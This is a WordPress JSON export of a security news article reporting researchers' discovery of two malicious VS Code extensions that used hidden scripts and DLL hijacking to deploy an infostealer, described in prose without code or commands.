{"id":3791,"date":"2025-12-10T03:38:30","date_gmt":"2025-12-10T03:38:30","guid":{"rendered":"https:\/\/ft365.org\/index.php\/2025\/12\/10\/malicious-vs-code-extensions-deploy-advanced-infostealer\/"},"modified":"2025-12-10T03:38:30","modified_gmt":"2025-12-10T03:38:30","slug":"malicious-vs-code-extensions-deploy-advanced-infostealer","status":"publish","type":"post","link":"http:\/\/ft365.org\/index.php\/2025\/12\/10\/malicious-vs-code-extensions-deploy-advanced-infostealer\/","title":{"rendered":"Malicious VS Code Extensions Deploy Advanced Infostealer"},"content":{"rendered":"<div id=\"cphContent_pnlArticleBody\" data-layout-id=\"2\" data-edit-folder-name=\"text\" data-index=\"0\">\n<p>A new pair of malicious Visual Studio Code extensions capable of harvesting screenshots, browser sessions and stored credentials has been discovered by cybersecurity researchers.<\/p>\n<p>The extensions, Bitcoin Black and Codo AI, were\u00a0available on the VS Code marketplace and were observed delivering\u00a0a stealthy DLL-based infostealer through an unusual combination of social engineering and technical disguise.<\/p>\n<p>The malicious tools were detailed in a report published by the Koi Security research team on Monday.<\/p>\n<h2>Two Extensions, One Campaign<\/h2>\n<p>Koi said what\u2019s new about this campaign is the way the attacker packaged the tools.<\/p>\n<p>Bitcoin Black presented itself as a cryptocurrency-themed color scheme, while Codo AI offered a functional coding assistant that integrated ChatGPT and DeepSeek.\u00a0Both, however, executed hidden scripts that downloaded a payload using a bundled version of the Lightshot screenshot tool paired with a malicious DLL.<\/p>\n<p>The researchers found that Bitcoin Black, despite claiming to be only a theme, used activation events and PowerShell execution uncommon for legitimate themes.<\/p>\n<p>Codo AI went further by providing genuine coding features, which helped the attacker avoid suspicion during installation and use.<\/p>\n<p><em>Read more on developer tool security: Red Team Tool Developer Shellter Admits \u2018Misuse\u2019 by Adversaries<\/em><\/p>\n<p>Koi said they analyzed multiple versions of the extensions and observed rapid refinement. Version 2.5.0 relied on a complex PowerShell routine that downloaded a password-protected ZIP archive and attempted extraction through several fallback methods.<\/p>\n<p>By version 3.3.0, the attacker had streamlined the delivery chain, switching to a hidden batch script that fetched an executable and DLL directly over HTTP and prevented repeated execution through a marker file.<\/p>\n<p>The infostealer collected a wide range of information, including:<\/p>\n<ul>\n<li>\n<p>Clipboard contents<\/p>\n<\/li>\n<li>\n<p>Installed programs<\/p>\n<\/li>\n<li>\n<p>Running processes<\/p>\n<\/li>\n<li>\n<p>Desktop screenshots<\/p>\n<\/li>\n<li>\n<p>Stored WiFi credentials<\/p>\n<\/li>\n<li>\n<p>Browser session data<\/p>\n<\/li>\n<\/ul>\n<h2>DLL Hijacking and C2 Links<\/h2>\n<p>As mentioned above, the payload used DLL hijacking by pairing a legitimate Lightshot executable with the attacker\u2019s DLL.\u00a0This method allowed the malware to run under the guise of a trusted binary.<\/p>\n<p>Koi Security identified command-and-control (C2) domains designed to receive exfiltrated data, along with a distinct mutex name intended to stop multiple instances from running simultaneously.<\/p>\n<p>The researchers\u00a0attributed both extensions to the same threat actor experimenting with separate lures.\u00a0<\/p>\n<p>\u201cA developer could install what looks like a harmless theme or a useful AI tool, and within seconds their WiFi passwords, clipboard contents and browser sessions are being exfiltrated to a remote server,\u201d\u00a0they explained.<\/p>\n<p>\u201cAt the time of writing, Codo AI is still live on the VS Code marketplace. The attack surface for developer tools continues to expand, and attackers are paying attention.\u201d<\/p>\n<\/p><\/div>\n","protected":false},"excerpt":{"rendered":"<p>A new pair of malicious Visual Studio Code extensions capable of harvesting screenshots, browser sessions and stored credentials has been discovered by cybersecurity researchers. The extensions, Bitcoin Black and Codo AI, were\u00a0available on the VS Code marketplace and were observed delivering\u00a0a stealthy DLL-based infostealer through an unusual combination of social engineering and technical disguise. The<\/p>\n","protected":false},"author":2,"featured_media":3792,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-3791","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized"],"featured_image_urls":{"full":["http:\/\/ft365.org\/wp-content\/uploads\/2025\/12\/3791-244a0710-2857-4a5e-8bfc-0e199b00262a.jpg",300,300,false],"thumbnail":["http:\/\/ft365.org\/wp-content\/uploads\/2025\/12\/3791-244a0710-2857-4a5e-8bfc-0e199b00262a-150x150.jpg",150,150,true],"medium":["http:\/\/ft365.org\/wp-content\/uploads\/2025\/12\/3791-244a0710-2857-4a5e-8bfc-0e199b00262a.jpg",300,300,false],"medium_large":["http:\/\/ft365.org\/wp-content\/uploads\/2025\/12\/3791-244a0710-2857-4a5e-8bfc-0e199b00262a.jpg",300,300,false],"large":["http:\/\/ft365.org\/wp-content\/uploads\/2025\/12\/3791-244a0710-2857-4a5e-8bfc-0e199b00262a.jpg",300,300,false],"1536x1536":["http:\/\/ft365.org\/wp-content\/uploads\/2025\/12\/3791-244a0710-2857-4a5e-8bfc-0e199b00262a.jpg",300,300,false],"2048x2048":["http:\/\/ft365.org\/wp-content\/uploads\/2025\/12\/3791-244a0710-2857-4a5e-8bfc-0e199b00262a.jpg",300,300,false],"morenews-featured":["http:\/\/ft365.org\/wp-content\/uploads\/2025\/12\/3791-244a0710-2857-4a5e-8bfc-0e199b00262a.jpg",300,300,false],"morenews-large":["http:\/\/ft365.org\/wp-content\/uploads\/2025\/12\/3791-244a0710-2857-4a5e-8bfc-0e199b00262a.jpg",300,300,false],"morenews-medium":["http:\/\/ft365.org\/wp-content\/uploads\/2025\/12\/3791-244a0710-2857-4a5e-8bfc-0e199b00262a.jpg",300,300,false],"crawlomatic_preview_image":["http:\/\/ft365.org\/wp-content\/uploads\/2025\/12\/3791-244a0710-2857-4a5e-8bfc-0e199b00262a-146x146.jpg",146,146,true]},"author_info":{"display_name":"henry","author_link":"http:\/\/ft365.org\/index.php\/author\/henry\/"},"category_info":"<a href=\"http:\/\/ft365.org\/index.php\/category\/uncategorized\/\" rel=\"category tag\">Uncategorized<\/a>","tag_info":"Uncategorized","comment_count":"0","_links":{"self":[{"href":"http:\/\/ft365.org\/index.php\/wp-json\/wp\/v2\/posts\/3791","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/ft365.org\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/ft365.org\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/ft365.org\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/ft365.org\/index.php\/wp-json\/wp\/v2\/comments?post=3791"}],"version-history":[{"count":0,"href":"http:\/\/ft365.org\/index.php\/wp-json\/wp\/v2\/posts\/3791\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/ft365.org\/index.php\/wp-json\/wp\/v2\/media\/3792"}],"wp:attachment":[{"href":"http:\/\/ft365.org\/index.php\/wp-json\/wp\/v2\/media?parent=3791"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/ft365.org\/index.php\/wp-json\/wp\/v2\/categories?post=3791"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/ft365.org\/index.php\/wp-json\/wp\/v2\/tags?post=3791"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}